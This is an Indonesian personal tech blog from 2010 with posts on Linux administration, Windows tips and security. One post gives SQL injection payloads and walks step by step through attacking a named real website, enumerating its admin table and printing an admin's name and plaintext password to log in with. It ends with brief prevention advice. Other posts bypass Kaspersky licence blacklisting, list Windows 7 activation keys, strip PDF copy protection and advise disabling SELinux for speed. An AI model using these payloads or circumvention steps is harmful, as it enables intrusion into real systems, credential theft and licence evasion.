Thursday, May 13, 2010

Menghapus Kernel Linux

Sekarang sangat mudah dalam meng upgrate linux yang kita punya. 
Biasanya saat kita telah meng update kernel akan menjadi 2, Linux tidak secara otomoatis menghapus kernel yang lama, makanya kita lebih baik menghapusnya demi menghemat space hardisk.


Cari tahu kernel apa yang kita gunakan saat ini !!
Untuk mengetahui kernel mana yang sedang anda gunakan saat ini, maka jalankan perintah dibawah ini
uname -r
Setelah itu akan muncul pesan sebagai berikut
2.6.28-15-generic
Melihat daftar kernel yang terinstall
Jalankan terminal lalu ketika tulisan dibawah ini
dpkg –list ‘linux-image*’
Setelah itu akan muncul list kernel nampak seperti gambar dibawah ini
Karnel image
Nah karena pada komputer saya menggunakan kernel 2.6.28-15-generic, tentunya kernel-kernel terdahulu sudah tidak diperlukan lagi untuk itu kita hapus satu per satu kernel yang tidak kita gunakan dengan mengetikan syntac dibawah ini:
sudo apt-get remove linux-image-2.6.28-11-generic
sudo apt-get remove linux-image-2.6.28-13-generic
sudo apt-get remove linux-image-2.6.28-14-generic
Sesuaikan nama kernel linux dengan kernel linux yang akan dihapus. Dan untuk menghapus kernel linux seperti Centos, Fedora, dan sekutunya :D silahkan gunakan perintah dibawah ini
rpm -e kernel-2.6.14-1.el5

smoga bermanfaat :)

Friday, April 23, 2010

Menambahkan Repo BackTrack 4

BackTrack 4 turunan Ubuntu juga yang diberi nama atau kodenamanya pwnsauce. Maka repository BackTrack 4 dapat ditambahkan dalam sistem operasi yang berbasis Ubuntu.Berikut cara installasi paket dari BackTrack.
Tahapan penambahan repo :

1. Buka terminal.
2. Menambahkan GPG Key,
wget -q http://archive.offensive-security.com/backtrack.gpg -O- | sudo apt-key add -

3. Menambahkan repo BackTrack 4,
echo "deb http://archive.offensive-security.com pwnsauce main microverse macroverse restricted universe multiverse" |sudo tee -a /etc/apt/sources.list

4. Perbaharui daftar paket,
sudo apt-get update

5. Silahkan kawan mencoba installasi salah satu paket yang ada dalam BackTrack 4, contoh :
sudo apt-get install framework3


Petunjuk BackTrack 4 dapat di unduh disini dan video pengantar BackTrack dapat dilihat http://www.offensive-security.com/videos/backtrack-security-training-video/up-and-running-backtrack.html

Selamat mencoba dan eksplorasi BackTrack 4.

Tuesday, April 13, 2010

Tips Mengarahkan Repository Centos 5.4 ke Server Local

Sering dapat masalah waktu update Centos. Problemnya adalah bandwith insternasionalnya kecil sehingga jadi lambat. hasil di google, dapat cara untuk merepository dari situs internasional ke local seperti ke biznet, cbn atau kambing.ui.ac.id dan mirror.unej.ac.id
Dan dari hasil pencarian dapatlah cara2nya sebagai berikut :
  • Login ke OS CentOSnya.
  • Buka Console atau Command line window, Applications >> Accessories >> Terminal.
  • Dan untuk melakukan perubahan-perubahanan, login ke account Super User dan masukan password root.
[Syawal@Syawalall~]$ su
Password:
  • Ubah nama file konfigurasi repository yang lama yang terdapat di /etc/yum.repos.d/CentOS-Base.repo sebagai backup.
[root@syawal~]# cp /etc/yum.repos.d/CentOS-Base.repo /etc/yum.repos.d/CentOS-Base.repo.old
  • Edit file konfigurasi repo yang CentOS-Base.repo dan isikan file tersebut dengan perintah nano atau vi terserah enaknya aja.
[root@syawal~]# nano /etc/yum.repos.d/CentOS-Base.repo
  • Masukkan text berikut :
[Add Ons]
name=CentOS
baseurl=ftp://mirror.unej.ac.id/centos/5.4/addons/i386/
enabled=1
gpgcheck=1
gpgkey=ftp://mirror.unej.ac.id/centos/RPM-GPG-KEY-CentOS-5
[CentOS Plus]
name=CentOS
baseurl=ftp://mirror.unej.ac.id/centos/5.4/centosplus/i386/
enabled=1
gpgcheck=1
gpgkey=ftp://mirror.unej.ac.id/centos/RPM-GPG-KEY-CentOS-5
[Extras]
name=CentOS
baseurl=ftp://mirror.unej.ac.id/centos/5.4/extras/i386/
enabled=1
gpgcheck=1
gpgkey=ftp://mirror.unej.ac.id/centos/RPM-GPG-KEY-CentOS-5
[Fasttrack]
name=CentOS
baseurl=ftp://mirror.unej.ac.id/centos/5.4/fasttrack/i386/
enabled=1
gpgcheck=1
gpgkey=ftp://mirror.unej.ac.id/centos/RPM-GPG-KEY-CentOS-5
[OS]
name=CentOS
baseurl=ftp://mirror.unej.ac.id/centos/5.4/os/i386/
enabled=1
gpgcheck=1
gpgkey=ftp://mirror.unej.ac.id/centos/RPM-GPG-KEY-CentOS-5
[Update]
name=CentOS
baseurl=ftp://mirror.unej.ac.id/centos/5.4/updates/i386/
enabled=1
gpgcheck=1
gpgkey ftp://mirror.unej.ac.id/centos/RPM-GPG-KEY-CentOS-5
  • Kalau udah selesai, simpan konfigurasi dengan menekan tombol Ctrl + O lalu tekan tombol ENTER dan dilanjutkan dengan menekan tombol Ctrl + X untuk keluar dari editor nano, dan tekan Esc lalu :wq! plus enter untuk editor vi
  • Kemudian update repository dengan perintah :
[root@syawal ~]# yum update
  • Brousing lagi cari yang bermanfaat, karena updatenya lumayan lama :)
NB:  ftp yang digunakan ftp://mirror.unej.ac.id

Semoga bermanfaat kawan !!!

Disable SELinux Centos5

Sebenarnya apa sih gunanya ? di Centos ataupun Fedora disable SELinux bisa menghemat banyak waktu utk proses, SELinux memblok fungsi-fungsi aplikasi yang sudah kita instal maka dari itu lebih baik kita disable biar ringan, enteng and ga banyak makan memori. Seperti nama blog ini saya juga masih nubie jd mohon dimaklumi atas semua keterbatasan :)
di bawah ini langkah untuk men-disable-kan SELinux di Centos 5






1.  Cek SELinux enable or disable
grep SELINUX /etc/selinux/config # SELINUX = can take one of these three values: SELINUX = enable
terlihat bahwa SELinux dalam posisi enable
2.  Mengubah enable menjadi disabl, edit menggunakan editor di sini saya menggunakan editor nano 
nano -w /etc/selinux/config
SELINUX = disable
Horee tinggal restart mesin Centos nya....

Semoga bermanfaat kawan !!!

fedora brousing secepat kilat dengan DNS lokal

Domain Name System (DNS) adalah distribute database system yang digunakan untuk pencarian nama
komputer (name resolution) di jaringan yang mengunakan TCP/IP (Transmission Control
Protocol/Internet Protocol). DNS biasa digunakan pada aplikasi yang terhubung ke Internet seperti web
browser atau e-mail, dimana DNS membantu memetakan host name sebuah komputer ke IP address.
Selain digunakan di Internet, DNS juga dapat di implementasikan ke private network atau intranet
dimana DNS memiliki keunggulan seperti:
1. Mudah, DNS sangat mudah karena user tidak lagi direpotkan untuk mengingat IP address
sebuah komputer cukup host name (nama Komputer).
2. Konsisten, IP address sebuah komputer bisa berubah tapi host name tidak berubah.
3. Simple, user hanya menggunakan satu nama domain untuk mencari baik di Internet maupun di
Intranet.

Kita harus Mengkonfigurasi dns server memakai dnsmasq disini saya menggunakan mesin fedora 10, lets play...

masuk ke root dulu pastinya ...
yang kita perlukan adalah Paket rpm dnsmasq, selanjutnya kita menginstal paketnya
# yum install dnsmasq
edit file pada /etc/dnsmasq.conf
# vi /etc/dnsmasq.conf
kemudian edit dan hilangkan tanda # kamu bisa juga menambahkan seperti di bawah :
listen-address=127.0.0.1
cache-size=2048
log-queries
log-facility=/var/log/dnsmasq.log
Selanjutnya  buat file beri nama dhclient.conf
# touch /etc/dhclient.conf
# vi /etc/dhclient.conf
copast scrip berikut ini:
prepend domain-name-servers 127.0.0.1;
request subnet-mask, broadcast-address, time-offset, routers,domain-name, domain-name-servers, host-name;
require subnet-mask, domain-name-servers;
timeout 60;
retry 60;
reboot 10;
select-timeout 5;
initial-interval 2;
Kemudian edit file /etc/resolv.conf
# vi /etc/resolv.conf
Aku pake speedy makanya kita set DNS telkom.net.id, di sesuaikan saja dengan isp kamu di sini daftar DNS server Lokal Bagi Pengguna khusus Indonesia

nameserver 10.10.0.1
nameserver  202.155.0.20
nameserver 202.155.0.15 



kita jalankan program dnsmasq dengan cara mengetikkan
# /etc/rc.d/init.d/dnsmasq start
Sekarang kita coba apakah setingan ini menghasilkan perubahan ?
# dig situs kesayangan kamu

Semoga bermanfaat kawan!!!

Thursday, April 1, 2010

SQL Injection, step by step

Akhir-akhir ini, kawan sering mendengar istilah "SQL Injection" ?
kawan tahu betapa berbahaya bug yang satu ini ?
Berikut akan kita sajikan step by step SQL Injection ini.

Berbagai syntax yang bisa kita gunakan:
untuk menginject suatu website (jika emang bisa diinject).

Oke, lets’ begin

Syntax SQL Injection
1. Commenting out.
Gunanya untuk mengakhiri suatu query, bypass query.
+ SQL Server
Syntax: –
Penggunaan: DROP namatabel;–
+ MySQL
Syntax: #
Penggunaan: DROP namatabel;#

Contoh penggunaan in real life:
* Username: admin’–
* Proses query yang terjadi di server:
SELECT * FROM userlist WHERE username=’admin’–’ AND password=’password’;
Query ini akan memberikan km akses sebagai admin karena query selanjutnya setelah — akan diabaikan

2. Inline comment
Gunanya untuk mengetahui versi SQL server yang digunakan atau untuk bypass script proteksi
+ SQL Server (MySQL juga bisa)
Syntax: /*Comment*/
Penggunaan: DROP/*comment*/namatabel
atau: DR/**/OP/*bypass proteksi*/namatabel
atau: SELECT/*menghindari-spasi*/password/**/FROM/**/userlist

+ MySQL (mendeteksi versi)
Syntax: /*!MYSQL Special SQL*/
Penggunaan: SELECT /*!32302 1/0,*/1 FROM namatabel
Note: Syntax juga bisa digunakan jika versi MySQL lebih tinggi dari 3.23.02 (sesuai query), tidak berfungsi untuk versi dibawahnya

3. Staking queries
Gunanya untuk menyambung 2 buah query dalam 1 transaksi.
+ SQL Server
Syntax: ;
Penggunaan: SELECT * FROM namatabel; DROP namatabel–

4. Pernyataan IF
Ini kunci jika melakukan Blind SQL Injection, juga berguna untuk testing sesuatu yang ga jelas secara akurat
+ SQL Server
Syntax: IF kondisi bagian-true ELSE bagian-false
Penggunaan: IF (1=1) SELECT ‘true’ ELSE SELECT ‘false’

+ MySQL
Syntax: IF(kondisi,bagian-true,bagian-false)
Penggunaan: SELECT IF(1=1,’true’,’false’)

5. Operasi String
Gunanya untuk bypass proteksi
+ SQL Server
Syntax: +
Penggunaan: SELECT login + ‘-’ + password FROM userlist
+ MySQL Server
Syntax: ||
Penggunaan: SELECT login || ‘-’ || password FROM userlist

Note: Jika MySQL server dalam mode ANSI syntax berfunsi. Cara lain adalah dengan menggunakan fungsi CONCAT() dalam MySQL.
Syntax: CONCAT(str1,str2,str3,…)
Penggunaan: SELECT CONCAT(login,password) FROM userlist

6. Union Injection
Gunanya menggabungkan 2 tabel yang berbeda dengan syarat tabel itu harus sama jumlah kolomnya.

Syntax: UNION
Penggunaan: ‘ UNION SELECT * FROM namatabel
atau: ‘ UNION ALL SELECT * FROM namatabel
atau: ‘ UNION SELECT kolom1,kolom2 FROM namatabel
Proses yang terjadi dalam query:
SELECT * FROM user WHERE id=’1′ UNION SELECT kolom1,kolom2 FROM namatabel

Jika tabel tersebut mempunyai kolom yang berbeda, maka dapat ditambahkan null atau 1
Penggunaan: ‘ UNION SELECT 1,kolom1,kolom2 FROM namatabel
Kurang lebih gitu kawan, kita lanjut lagi ke step by stepnya. Jangan malas baca ya, karena itu yang membuat kita selalu ketinggalan.
====================================================================================


Catatan kawan: Di baris berikutnya ini kita akan membatasi bahasan pada SQL Injection
di MS-SQL Server.

Kita akan mengambil contoh di site www.pln-wilkaltim.co.id
kawan dua kelemahan di site ini, yaitu:
1. Tabel News
2. Tabel Admin

Langkah pertama, kita tentukan lubang mana yang bisa di-inject
dengan jalan berjalan-jalan (enumeration) dulu di site tsb.
Kita akan menemukan 2 model cara input parameter, yaitu dengan
cara memasukkan lewat input box dan memasukkannya lewat
alamat URL.

Kita ambil yang termudah dulu, dengan cara input box.
Kemudian kita cari kotak login yang untuk admin.
Ketemu di www.pln-wilkaltim.co.id/sipm/admin/admin.asp
Langkah pertama untuk menentukan nama tabel dan fieldnya,
kita inject kotak NIP dengan perintah (password terserah, cabang
biarkan aja):
' having 1=1--
jangan lupa untuk menuliskan tanda kutip tunggal dan tanda
minus dobel (penting).
Arti kedua tanda tsb bisa anda cari di tutorial SQL Injection
di www.neoteker.or.id.
Kemudian akan keluar pesan error:
--------------------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]Column
'T_ADMIN.NOMOR' is invalid in the select list because
it is not contained in an aggregate function and
there is no GROUP BY clause.
/sipm/admin/dologin.asp, line 7
--------------------
Keluarlah nama field pertama kita !!!
Catat nama tabel : T_ADMIN
Catat nama field : NOMOR

Kemudian kita akan mencari nama field-field berikutnya,
beserta nama tabel yang mungkin berbeda-beda.
Kita inject di kotak NIP (password terserah):
' group by T_ADMIN.NOMOR having 1=1--
Akan keluar pesan error:
--------------------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]Column
'T_ADMIN.NIP' is invalid in the select list because
it is not contained in either an aggregate
function or the GROUP BY clause.
/sipm/admin/dologin.asp, line 7
--------------------
Artinya itulah nama tabel dan field kedua kita.
Catat : T_ADMIN.NIP

Kemudian kita cari field ke tiga :
' group by T_ADMIN.NOMOR,T_ADMIN.NIP having 1=1--
Akan keluar pesan error:
--------------------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]Column
'T_ADMIN.PASSWORD' is invalid in the select list because
it is not contained in either an aggregate
function or the GROUP BY clause.
/sipm/admin/dologin.asp, line 7
--------------------
Catat field ke tiga : T_ADMIN.PASSWORD

Lakukan langkah di atas sampai kita menemukan field terakhir.

Berikut adalah pesan error yang terjadi, jika kita mengecek
field terakhir dengan meng-inject:
' group by T_ADMIN.NOMOR,T_ADMIN.NIP,T_ADMIN.PASSWORD,
T_ADMIN.NAMA,T_ADMIN.KD_RANTING,T_ADMIN.ADDRESS,T_ADMIN.EMAIL
having 1=1--
(catatan : kalimat harus 1 baris, tidak dipotong)
--------------------
- NIP atau Password atau Unit Anda salah !! -
--------------------
Sukses !!! Kita berhasil menemukan field terakhir.
Daftar kolom (field):
T_ADMIN.NOMOR
T_ADMIN.NIP
T_ADMIN.PASSWORD
T_ADMIN.NAMA
T_ADMIN.KD_RANTING
T_ADMIN.ADDRESS
T_ADMIN.EMAIL
Hanya ada satu tabel untuk otentifikasi ini (yaitu T_ADMIN),
ini akan mempermudah proses kita selanjutnya.

Langkah berikutnya, kita menentukan jenis struktur field-
field tersebut di atas.

Kita inject di kotak NIP (pass terserah) :
' union select sum(NOMOR) from T_ADMIN--
Arti dari query tersebut adalah : kita coba menerapkan
klausa sum sebelum menentukan apakah jumlah kolom-kolom
di dua rowsets adalah sejenis.
Bahasa mudahnya adalah kita memasukkan klausa sum (jumlah)
yang berlaku untuk type kolom numerik, jadi untuk type kolom
yang bukan numerik, akan keluar error yang bisa memberitahu
kita jenis kolom yang dimaksud.
Pesan error :
--------------------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]All queries
in an SQL statement containing a UNION operator must have
an equal number of expressions in their target lists.
/sipm/admin/dologin.asp, line 7
--------------------
artinya kolom NOMOR berjenis numerik.

Berikutnya kita inject :
' union select sum(NIP) from T_ADMIN--
Akan keluar pesan error :
--------------------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E07)
[Microsoft][ODBC SQL Server Driver][SQL Server]The sum
or average aggregate operation cannot take a char data
type as an argument.
/sipm/admin/dologin.asp, line 7
--------------------
Artinya kolom NIP bertype char.

Kita harus mengulang perintah di atas untuk kolom yang
berikutnya dengan jalan mengganti nama_kolom di :
' union select sum(nama_kolom) from T_ADMIN--
dengan kolom yang berikutnya.
Kita peroleh 7 type kolom:
T_ADMIN.NOMOR => numeric
T_ADMIN.NIP => char
T_ADMIN.PASSWORD => nvarchar
T_ADMIN.NAMA => char
T_ADMIN.KD_RANTING => char
T_ADMIN.ADDRESS => nvarchar
T_ADMIN.EMAIL => char

Langkah berikutnya, kita akan mencari isi kolom password,
untuk user admin, dengan meng-inject :
' union select min(NAMA),1,1,1,1,1,1 from T_ADMIN where NAMA > 'a'--
artinya kita memilih minimum nama user yang lebih besar dari 'a'
dan mencoba meng-konvert-nya ke tipe integer.
Arti angka 1 sebanyak 6 kali itu adalah bahwa kita hanya memilih
kolom NAMA, dan mengabaikan 6 kolom yang lain.
Akan keluar pesan error :
--------------------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E07)
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax
error converting the varchar value 'bill ' to
a column of data type int.
/sipm/admin/dologin.asp, line 7
--------------------
Anda lihat :
varchar value 'bill '
'bill' itu adalah nama user di record yang terakhir dimasukkan,
atau isi kolom NAMA di record yang terakhir dimasukkan.

Selanjutnya kita inject :
' union select min(PASSWORD),1,1,1,1,1,1 from T_ADMIN where
NAMA = 'bill'--
catatan : harus sebaris (tidak dipotong).
Akan keluar error :
---------------------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E07)
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax
error converting the nvarchar value 'm@mpusk@u' to a
column of data type int.
/sipm/admin/dologin.asp, line 7
---------------------
Artinya kita berhasil !!!
Kita dapatkan
[+] NAMA = bill
[+] PASSWORD = m@mpusk@u

Silahkan kawan login ke :
www.pln-wilkaltim.co.id/sipm/admin/admin.asp
dengan account di atas, sedang nama cabang, silahkan kawan
isi sendiri dengan cara coba-coba

Atau kita pakai jalan pintas saja....

Kita inject-kan :
' union select min(KD_RANTING),1,1,1,1,1,1 from T_ADMIN
where NAMA ='bill'--
catatan : harus satu baris.
Duarrrrrr..........
Glhodhak.............
Langsung masuk ke menu admin.
Ingat : Kawanjangan buat kerusakan ! beritahu sang admin !!! itu pun kalau kawan berhasil masuk, heheh. Kawan harus berhati2 juga karena biasanya sistem keamanan admin mencatat segala aktifitas user yang masuk di log . . . huuu atuutt, seperti kejadian salah satu mahasiswa di kampus saya, jadinya gi mana tuh ? yaa gitu deh akses internet ke fakultas MIPA di putus selama 2 hari, yaudah kita lanjut aja lgi ya . . . kapan2 kita sambung lagi critanya, waktunya tutorial.

kawan lanjut Lubang ke dua adalah pada bagian berita.
Pada dasarnya berita di situ adalah isi dari tabel yang
lain lagi. Jadi tetep bisa kita inject !!!
Bedanya, kita harus memasukkan parameter di alamat URL-nya.
Contoh :
www.pln-wilkaltim.co.id/dari_Media.asp?id=2119&idm=40&idSM=2
ada parameter id dan idSM.
Setelah kita coba inject, ternyata yang berpengaruh adalah
parameter id aja (CMIIW).

Kita inject-kan :
www.pln-wilkaltim.co.id/dari_Media.asp?id=2119' having 1=1--
akan keluar pesan error :
---------------------------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]Column
'tb_news.NewsId' is invalid in the select list because
it is not contained in an aggregate function and
there is no GROUP BY clause.
/dari_Media.asp, line 58
---------------------------
artinya 'tb_news.NewsId' itulah nama tabel dan kolom kita
yang pertama kawan.

Ulangi langkah-langkah kita di atas sampai didapatkan :
tb_news.NewsId => numeric
tb_news.NewsCatId => numeric
tb_news.EntryDate => datetime
tb_news.Title => nvarchar
tb_news.Content =>
tb_news.FotoLink =>
tb_news.FotoType => bit data
tb_news.review =>
tb_news.sumber => char
tb_news.dateagenda => datetime

Nah, selanjutnya adalah tugas kawan sendiri untuk mengembangkan
pengetahuan kawan, yang terpenting adalah membaca.
kawan bisa men-insert berita yang bisa anda tentukan sendiri
isinya.

Inilah mengapa hole di MS-SQL Server ini demikian berbahaya.

Perkiraan saya, nama-nama partai di situs KPU yang di-hack
oleh Shizoprenic, juga ada di tabel-tabel suatu database,
jadi tetep bisa dimasuki dengan cara SQL Injection ini.
keliatannya kerenkan ?
tp sulit, kita hrus memberikan waktu luang lebih untuk belajar SQL injection dari dasar.

******************************************************
KHUSUS BUAT ADMIN & WEB PROGRAMMER !!!
******************************************************
Cara pencegahan yang umum digunakan :
1. Batasi panjang input box (jika memungkinkan), dengan
cara membatasinya di kode program, jadi si cracker pemula
akan bingung sejenak melihat input box nya gak bisa di
inject dengan perintah yang panjang.
2. Filter input yang dimasukkan oleh user, terutama penggunaan
tanda kutip tunggal (Input Validation).
3. Matikan atau sembunyikan pesan-pesan error yang keluar
dari SQL Server yang berjalan.
4. Matikan fasilitas-fasilitas standar seperti Stored Procedures,
Extended Stored Procedures jika memungkinkan.
5. Ubah "Startup and run SQL Server" menggunakan low privilege user
di SQL Server Security tab.


Yah itulah mungkin yang dapat saya ceritakan.....
Hal itu adalah gambaran kawan, betapa tidak amannya dunia internet...
Kalau mau lebih aman, kawan copot kabel jaringan kawan, copot disk
drive kawan, copot harddisk kawan, jual kompie kawan !!!
Just kidding ;)
selamat mencoba kawan.


Referensi :
[+] sqlinjection, www.BlackAngels.it
[+] anvanced sql injection in sql server applications
(www.ngssoftware.com)
[+] sql injection walktrough (www.securiteam.com)

Membuka dan Mengubah File PDF yang Di Proteksi

Sedikit tentang Adobe Reader,
Adobe reader itu sistem keamanan aplikasinya bekerja sesuai setingan user, kalau usernya teliti dengan setingan sistem keamanan yang ada maka file PDF akan aman dan sebaliknya.
Bagaimana cara kita menembus sistem keamanan PDF yang kadang kala mengganggu kita dalam pencetakan atau tidak bisa di kopy past, contoh sederhana yang saya alami, padahal pada saat itu keadaan sangat penting, kita harus mentranslete isi file PDF tersebut ke bahasa Indonesia, karena kebetulan kita dapat file bahasa rusia tentang keamanan jaringan hehe.
Mau ga mau harus di copy past, kita msuk ke tahap membuka proteksi :
1. kamu harus punya OS linux apa aja yg penting linux, saya di sini menggunakan ubuntu 9.10
2. kita perlu poppler-utils langsung masuk ke root terlebih dahulu lalu,
$ apt-get install poppler-utils
3. Selanjutnya masuklah ke direktori tempat file PDF tersebut berada. Direktori yang digunakan dalam artikel ini adalah $HOME/Documents. Untuk melihat informasi mengenai dokumen PDF, gunakan perintah pdfinfo
$ pdfinfo options
4. Untuk menkonversi dokumen PDF ke format teks, gunakan perintah pdftotext
$ pdftotext options
5. Untuk mengkonversi PDF ke format postscript, gunakan perintah pdf2ps
$pdf2ps -dASCII85EncodePages=false -dLanguageLevel=1|2|3 input.pdf output.ps
6. Untuk mengekstraksi gambar yang berada pada dokumen tersebut, gunakan perintah pdfimages.
$ pdfimages options
7. Untuk melakukan pencetakan, yang diperlukan hanyalah aplikasi kghostview.
selesai, disini yang tadinya file PDF Acrobat Reader tidak bisa di print ataupun di copy past sudah bisa di di ubah menjadi berbagai model teks .
kghostview memang untuk membaca dokumen postscript, namun selain file ps format pdf pun dapat dibaca oleh aplikasi yang satu ini. Bagaimana jika dokumen ‘teramankan’ tadi dibuka selain menggunakan kghostview, seperti kpdf atau xpdf? kpdf tidak memberikan akses untuk mencetak dokumen.

Melakukan pencetakan dokumen lewat kghostview, sama halnya dengan aplikasi lainnya, cukup dengan mengakses menu File > Print… atau dengan shortcut Ctrl + P. Tidak akan muncul peringatan bahwa dokumen PDF diproteksi dan sebagainya dan dokumen PDF tersebut pun akan dicetak di atas kertas. Pengaturan pencetakan pun dapat dilakukan, semisal pemilihan printer yang akan digunakan, pengaturan ukuran kertas, kualitas pencetakan, halaman yang akan dicetak dan sebagainya.

Sebagai informasi, versi PDF yang digunakan dalam tutorial ini adalah 1.4.
Semoga bermanfaat kawan.

Port yang sangat sering dilakukan penetrasi (hacking)

Di bawah ini beberapa port yang sangat sering dilakukan penetrasi (hacking) oleh para peretas :

* TCP port 20 dan 21 FTP (File Transfer Protocol)
* TCP port 23 Telnet (Terminal Emulation)
* TCP port 25 SMTP (Simple Mail Transfer Protocol)
* TCP dan UDP port 53 DNS (Domain Name System)
* TCP port 80 dan 443 HTTP dan HTTPs (Hypertext Transfer Protocol)
* TCP port 110 POP3 (Post Office Protocol version 3)
* TCP dan UDP port 135 RPC
* TCP dan UDP port 137 – 139 NetBIOS over TCP/IP
* TCP dan UDP port 161 SNMP (Simple Network Management Protocol)

demikian, semoga bermanfaat sebagai antisipasi keamanan jaringan anda.

Sunday, March 28, 2010

Tips Key Kaspersky anti Blacklist

Seperti yang kita ketahui bersama. Bagi Anda pengguna Antivirus Kaspersky, memang sangat diakui ketangguhannya dalam melindungi komputer kita dari file-file berbahaya di internet. Namun sayangnya program ini berbayar, dan Kaspersky akan memblacklist registration key yang tidak original. Berikut ini ada sedikit tips untuk Anda bagi pengguna Antivirus Kaspersky agar key registration anti blacklist.

Prosesnya juga tidak memakan waktu lama, Anda hanya perlu sedikit ketelitian dalam melakukan tips ini, pastikan Anda membaca tutorialnya dengan jelas. Tips Key Kaspersky anti Blacklist ini selama ini bisa saya gunakan untuk Kaspersky Internet Security 2010 v9.0.0.459 dan v9.0.0.463.

* Hal pertama, pastikan komputer Anda harus terhubung dengan koneksi internet. Jangan membuka browsing saat melakukan tips ini, karena Kaspersky akan dinon-aktifkan untuk sementara dan menghindari file jahat bisa bebas masuk ke komputer Anda.
* Pastikan Kaspersky Antivirus sudah terinstall di komputer Anda. Jika sudah terpasang key registration, Anda bisa delete key tersebut. (Tulisan License dibawah)
* Setelah itu akan muncul menu “Activation Wizard”, abaikan atau cancel perintah itu.
* Kemudian pilih Setting, hilangkan checklist pada Enable Self Defence, kemudian klik OK.
* Langkah selanjutnya adalah Exit program Kaspersky dari taskbar/startup. (Icon kecil yang berada di pojok kanan bawah).
* Buka menu Run (Windows + R) kemudian klik regedit dan OK.
* Cari key HKEY_LOCAL_MACHINE\SOFTWARE\Kaspersky\Lab\Protected\AVP9\Environment.
* Kemudian di kolom sebelah kanan, cari nama “ProductStatus”. Anda bisa langsung menggunakan CTRL + F kemudian search nama tersebut.
* Klik 2x kemudian pada kolom value Release diganti menjadi Beta, kemudian OK.
* Exit Registry. Kemudian aktifkan lagi Kaspersky melalui Start > All Program > Kaspersky.
* Akan muncul pop-up windows activation, pilih Beta License.
* Anda akan otomatis mendapatkan License dari Kaspersky Lab yang tidak akan terblacklist.
* Jangan lupa aktifkan kembali Enable Self Defence. Finish!

Key registration dari Kaspersky tersebut akan berlaku selama 30 hari saja karena versi Beta. Tenang saja karena kemampuan versi Beta tidak beda dengan Release. Jika aktivasi key mencapai limit, Anda bisa mengulangi langkah seperti diatas.

Cara Aktivasi Windows 7 Ultimate

untuk tanpa memasukkan key silahkan donwload http://x7.to/9fww6h

ini public key dari microsoft sendiri.setelah menggunakan key ini windows 7 anda menjadi genuine..

windows 7 ultimate rc 7057

64-bit

D9RHV-JG8XC-C77H2-3YF6D-RYRJ9
JYDV8-H8VXG-74RPT-6BJPB-X42V4
RFFTV-J6K7W-MHBQJ-XYMMJ-Q8DCH
482XP-6J9WR-4JXT3-VBPP6-FQF4M

32-bit

TQ32R-WFBDM-GFHD2-QGVMH-3P9GC
4HJRK-X6Q28-HWRFY-WDYHJ-K8HDH
GG4MQ-MGK72-HVXFW-KHCRF-KW6KY
6JKV2-QPB8H-RQ893-FW7TM-PBJ73

windows 7 ultimate rc 7100

Activation Keys for Windows 7 RC 32 bit:

TQ32R-WFBDM-GFHD2-QGVMH-3P9GC
GG4MQ-MGK72-HVXFW-KHCRF-KW6KY
4HJRK-X6Q28-HWRFY-WDYHJ-K8HDH
QXV7B-K78W2-QGPR6-9FWH9-KGMM7

Activation Keys for Windows 7 RC 64 bit:

7XRCQ-RPY28-YY9P8-R6HD8-84GH3
RFFTV-J6K7W-MHBQJ-XYMMJ-Q8DCH
482XP-6J9WR-4JXT3-VBPP6-FQF4M
JYDV8-H8VXG-74RPT-6BJPB-X42V4
D9RHV-JG8XC-C77H2-3YF6D-RYRJ9

Saturday, March 13, 2010

Windows 7 Mematikan servis Hibernate

Apa itu hibernate? merupakan fitur khusus pada Operating System, dimana semua isi atau data yang saat itu didalam RAM(Random Access Memory) akan di simpan kedalam tempat penyimpanan yang bersifat tidak sementara atau non-volatile memory seperti Harddisk, yang nanti menjadi sebuah file sebelum komputer dimatikan, dan saat komputer dinyalakan kembali, maka data akan dikembalikan kedalam RAM sama persis saat melakukan Hibernate.

Proses manyalakan komputer setelah Hibernate lebih cepat ketimbang saat menyalakan komputer pertama kali, tentu saja konsekuensinya Harddisk harus memiliki kapasitas yang cukup memadai untuk mendukung proses Hibernate, namun jika anda merasa tidak memerlukan proses Hibernate anda dapat me-nonaktifkannya.

Pada Windows 7 cukup ikuti langkah berikut ini:
1. Klik tombol Windows/Start kemudian pada search ketikkan CMD
2. Ini akan membuka window command prompt
3. Kemudian ketikkan powercfg -h off

have fun

Wednesday, March 10, 2010

Configurasi Linux as rooter – Network Scenario

Pokok permasalahannya 3 desktop and 2 routers, computer memakai OS Linux.

topology
Desktop A
route add -net 172.17.0.0 gw 11.0.0.254
route add -net 192.168.2.0 netmask 255.255.255.0 gw 11.0.0.254

Desktop B

route add -net 11.0.0.0 netmask 255.0.0.0 gw 172.17.0.254
route add -net 192.168.2.0 netmas, 255.255.255.0 gw 172.17.254.254

Desktop C

route add -net 172.17.0.0 netmask 255.255.0.0 gw 192.168.2.254
route add -net 11.0.0.0 gw 192.168.2.254

Router ABC

eth0 172.17.0.254/16
eth0:1 11.0.0.254/8
echo “1″ > /proc/sys/net/ipv4/ip_forward
route add -net 192.168.2.0 gw 172.17.254.254

ROUTER BCA

eth0 172.17.254.254/16
eth0:1 192.168.2.254/24
echo “1″ > /proc/sys/net/ipv4/ip_forward
route add -net 11.0.0.0 netmask 255.0.0.0 gw 172.17.0.254

Cara install Compiz-Fusion – Gnome – Fedora 10 x86_64

Apa itu Compiz-Fusion ?
Pasti beberapa teman sudah tau yang dimaksud dengan Kompiz, suatu aplikasi desktop yang memberikan berbagai bentuk tampilan animasi dalam memperindah Gui Computer kita. Dalam hal ini saya tidak terlalu banyak menjabarkan tentang Kompiz itu sendiri, akan tetapi lebih kepada bagaimana cara penginstalannya dan seting pada configurasi yang akan lebih meningkatkan kinerja Compiz.

